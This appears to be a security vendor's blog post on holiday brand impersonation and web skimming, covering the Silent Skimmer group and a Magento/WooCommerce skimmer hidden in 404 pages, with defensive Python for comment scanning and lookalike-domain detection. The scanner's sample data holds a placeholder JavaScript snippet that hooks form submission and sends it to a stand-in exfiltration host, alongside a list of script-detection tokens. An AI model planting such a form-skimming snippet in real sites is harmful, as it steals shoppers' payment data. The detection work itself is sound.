Defending Your Online Presence: Holiday Brand Impersonation and Web Skimming

Background

During the holiday season, deceptive websites surge: nearly 78% of individuals encounter brand impersonation scams, in which threat actors pose as legitimate brands to deceive users. These fraudulent sites mimic banks, eCommerce platforms, and other trusted entities using tactics such as cloning, mirroring, typosquatting, brandjacking, and scareware. Threat actors also employ web skimming, covertly inserting malicious code into websites to capture data submitted through HTML forms, a sophisticated technique for data extraction attacks. In 2022, these deceptive sites caused losses of $8.8 billion. Unfortunately, many businesses remain unaware of these threats until they suffer financial or reputational damage.

New Campaigns

The “Silent Skimmer” is a financially motivated cyber group active in the Asia-Pacific (APAC) region. It targets vulnerable online payment infrastructure, breaking into web servers through software flaws and collecting consumers’ financial data with payment-scraping techniques. The group is proficient in Chinese and also has victims in North America. Its tactics center on exploiting web application vulnerabilities, particularly in Internet Information Services (IIS); it uses a variety of tools and has historically exploited CVE-2019-18935. The campaign employs multiple techniques and deploys a Remote Access Tool (RAT) capable of a range of tasks. The group looks for weaknesses in web applications worldwide, focusing on servers that lack modern security technologies, especially those that handle payment data.

Separately, another campaign has emerged that poses a significant threat to Magento and WooCommerce websites. This sophisticated campaign comprises three elements: a loader, the malicious attack code, and data exfiltration. The loader is a crucial JavaScript snippet whose job is to deploy the attack code. The attack code is multifunctional, handling data detection, disruption of the checkout process, and the injection of counterfeit forms. The exfiltration stage sends the stolen information to a command-and-control server.

Notably, the campaign targeting Magento and WooCommerce websites has appeared in three distinct variations, reflecting an evolving threat landscape. The attacker’s ability to make swift improvements is remarkable. The third variation stands out for hiding malicious code in the website’s default 404 error page, which improves its ability to evade detection. Of particular concern, the malicious comments on the 404 error page persist even after the loaders have been removed from affected websites. This residual presence means the skimmer could reactivate the attack, so vigilant monitoring is necessary.
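The two paragraphs above describe a skimmer whose loader pulls its payload out of a comment on the site's own 404 page, and note that the comment can outlive the loader. The following scanner is an added example written for this article, not code from the article or from any of the research it summarizes. It walks the HTML comments of an error page and flags any that contain script-like tokens or a base64 blob that decodes to script-like text. The sample 404 page, the placeholder payload inside it, and the token list are all constructed for the demonstration; the payload is a harmless stand-in that merely looks like a script to the scanner.

```python
import base64
import binascii
import re

# Matches HTML comments, including ones that span several lines.
COMMENT_RE = re.compile(r"<!--(.*?)-->", re.DOTALL)
# A long run of base64 alphabet characters; developer notes rarely contain one.
BASE64_BLOB_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
# Tokens that indicate executable JavaScript rather than a developer note.
# Most contain punctuation, so they cannot occur by chance inside a base64 blob.
SCRIPT_HINTS = (
    "document.", "window.", "fetch(", "eval(", "atob(", "XMLHttpRequest",
    "addEventListener(", "querySelector(", ".submit(",
)


def try_base64_text(blob):
    """Decode a base64 blob to UTF-8 text; return None if it is not valid base64 text."""
    core = blob.rstrip("=")
    padded = core + "=" * (-len(core) % 4)
    try:
        return base64.b64decode(padded, validate=True).decode("utf-8")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None


def extract_comments(html):
    """Return the stripped body of every HTML comment in document order."""
    return [m.group(1).strip() for m in COMMENT_RE.finditer(html)]


def analyze_error_page(html, max_comment_len=500):
    """Flag comments that look like hidden script payloads rather than notes.

    Returns a list of findings; an empty list means nothing suspicious was seen.
    """
    findings = []
    for idx, comment in enumerate(extract_comments(html)):
        reasons = []
        direct = [h for h in SCRIPT_HINTS if h in comment]
        if direct:
            reasons.append("comment contains script-like tokens: " + ", ".join(direct))
        for blob in BASE64_BLOB_RE.findall(comment):
            decoded = try_base64_text(blob)
            if decoded is None:
                continue
            hits = [h for h in SCRIPT_HINTS if h in decoded]
            if hits:
                reasons.append("base64 blob decodes to script-like text: " + ", ".join(hits))
        if len(comment) > max_comment_len:
            reasons.append(f"unusually long comment ({len(comment)} chars)")
        if reasons:
            findings.append({"comment_index": idx, "preview": comment[:60], "reasons": reasons})
    return findings


# Constructed sample: a placeholder payload hidden in a comment the way the article describes.
# The decoded text is a harmless stand-in that only needs to look like a script to the scanner.
_PLACEHOLDER_PAYLOAD = (
    "document.querySelector('form').addEventListener('submit',"
    "function(){fetch('https://exfil.invalid/collect')});"
)
SAMPLE_404_HTML = (
    "<!DOCTYPE html><html><head><title>404 Not Found</title></head><body>\n"
    "<!-- generated by the storefront theme -->\n"
    "<h1>Page not found</h1>\n"
    "<!-- " + base64.b64encode(_PLACEHOLDER_PAYLOAD.encode()).decode() + " -->\n"
    "</body></html>\n"
)
# Constructed sample of a clean error page for comparison.
CLEAN_404_HTML = (
    "<html><body><!-- generated by the storefront theme -->"
    "<h1>Page not found</h1></body></html>"
)

if __name__ == "__main__":
    for finding in analyze_error_page(SAMPLE_404_HTML):
        print(finding)
```

Because the article notes that the hidden comment survives removal of the loader, a check like this belongs in a recurring job that fetches the live 404 page (and any other static error pages) and diffs the comment findings against a known-good baseline, rather than a one-off run during incident cleanup.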

Mitigation Strategies

Many employees lack the essential skills to recognize deceptive websites. Cybersecurity training frequently overlooks emerging threats such as website spoofing, often treating them as end-user problems rather than substantial cybersecurity challenges. Closing this training gap is vital to mitigate the risks of phishing attacks, malware distribution, and data breaches orchestrated by disguised websites. Strengthening employees’ capacity to detect spoofed websites and related email schemes is crucial to fortify the organization’s overall cybersecurity readiness.

Organizations should train employees to:

  1. Be cautious when receiving requests for money transfers, especially if the sender’s name and email address don’t align.
  2. Always verify email addresses and be wary of vague, threatening, or persuasive emails, especially those with suspicious links.
  3. Exercise skepticism with text messages containing links or requests, as urgency and enticing offers are common tactics employed by smishing attacks.
  4. Familiarize themselves with social engineering tactics, such as the exploitation of authority and altruism, so they can recognize and resist manipulative schemes.
  5. When visiting a website that might be deceptive, scrutinize the URL for misspellings or extra characters, prioritize secure sites (https://), and use domain lookup services to check registration information. If uncertain, seek advice from colleagues or the IT department.
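Item 5 asks people to spot misspelled or padded URLs by eye. The function below is an added example (not from the article) of the same check done programmatically, so it can back a mail gateway or browser-extension allow-list: it folds visually confusable characters, computes the edit distance between the URL's registrable domain and a list of known brand domains, and flags a brand name that appears in a domain the brand does not own. The brand list is a constructed placeholder, and the "last two labels" rule for the registrable domain is a simplification; production code should use the Public Suffix List.

```python
from urllib.parse import urlsplit

# Constructed placeholder list of the organization's own or partner brand domains.
KNOWN_BRAND_DOMAINS = ("examplebank.com", "exampleshop.com")

# Character sequences commonly substituted in lookalike domains.
# Multi-character substitutions are applied before single-character ones.
MULTI_CONFUSABLES = (("rn", "m"), ("vv", "w"))
SINGLE_CONFUSABLES = str.maketrans("0135", "oles")


def normalize(text):
    """Fold confusable characters so 'exarnp1ebank' compares equal to 'examplebank'."""
    folded = text.lower()
    for src, dst in MULTI_CONFUSABLES:
        folded = folded.replace(src, dst)
    return folded.translate(SINGLE_CONFUSABLES)


def levenshtein(a, b):
    """Standard edit distance (insert, delete, substitute) between two strings."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def assess_url(url, known_domains=KNOWN_BRAND_DOMAINS, max_distance=2):
    """Classify a URL as 'known', 'lookalike' or 'unrelated' relative to the brand list."""
    parts = urlsplit(url)
    host = (parts.hostname or "").rstrip(".")
    labels = host.split(".")
    # Simplification: treat the last two labels as the registrable domain.
    # Real code should consult the Public Suffix List (e.g. example.co.uk has three labels).
    registrable = ".".join(labels[-2:]) if len(labels) >= 2 else host

    transport = [] if parts.scheme == "https" else ["not served over https"]
    if registrable in known_domains:
        return {"host": host, "registrable": registrable, "verdict": "known",
                "closest": registrable, "reasons": transport}

    norm_reg = normalize(registrable)
    closest = min(known_domains, key=lambda d: levenshtein(norm_reg, normalize(d)))
    distance = levenshtein(norm_reg, normalize(closest))

    lookalike = []
    if distance <= max_distance:
        lookalike.append(f"resembles {closest} (edit distance {distance} after confusable folding)")
    # A brand name used as, or inside, a label of a domain the brand does not own,
    # e.g. examplebank.com.secure-login.example or examplebank-login.com.
    for brand in known_domains:
        brand_label = brand.split(".")[0]
        if any(brand_label in normalize(label) for label in labels):
            lookalike.append(f"contains brand name '{brand_label}' but is not {brand}")
            break

    return {"host": host, "registrable": registrable,
            "verdict": "lookalike" if lookalike else "unrelated",
            "closest": closest, "reasons": transport + lookalike}


if __name__ == "__main__":
    # Constructed test URLs; none of these hosts are real brand domains.
    for sample in ("https://examplebank.com/login",
                   "http://exarnplebank.com/login",
                   "https://examp1ebank.com/",
                   "https://examplebank.com.secure-login.example/",
                   "https://unrelated.example/"):
        print(sample, "->", assess_url(sample))
```

Folding confusables on both sides means a legitimate domain containing "rn" still matches itself, so the fold only affects the comparison, never the verdict for an exact allow-list hit. The edit-distance threshold and the brand list are the two knobs to tune against your own domains and their common typos.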

Conclusion

In the ever-evolving landscape of cybersecurity, the discovery of brand impersonation and web skimming is a stark reminder of the constant need for vigilance and adaptation in defense strategies. The use of advanced concealment techniques in these campaigns, including the innovative exploitation of the default 404 error page, underscores the need for organizations to remain proactive in their efforts to detect and mitigate such threats. Awareness, preparedness, and swift response are imperative to protect sensitive data and maintain the integrity of online platforms in the face of such sophisticated and evolving cyber threats.


CRITICALSTART® offers a pioneering solution to modern organizational challenges in aligning cyber protection with risk appetite through its Cyber Operations Risk & Response™ platform, award-winning Managed Detection and Response (MDR) services, and a dedicated human-led risk and security team. By providing continuous monitoring, mitigation, maturity assessments, and comprehensive threat intelligence research, they enable businesses to proactively protect critical assets with measurable ROI. Critical Start’s comprehensive approach allows organizations to achieve the highest level of cyber risk reduction for every dollar invested, aligning with their desired levels of risk tolerance.

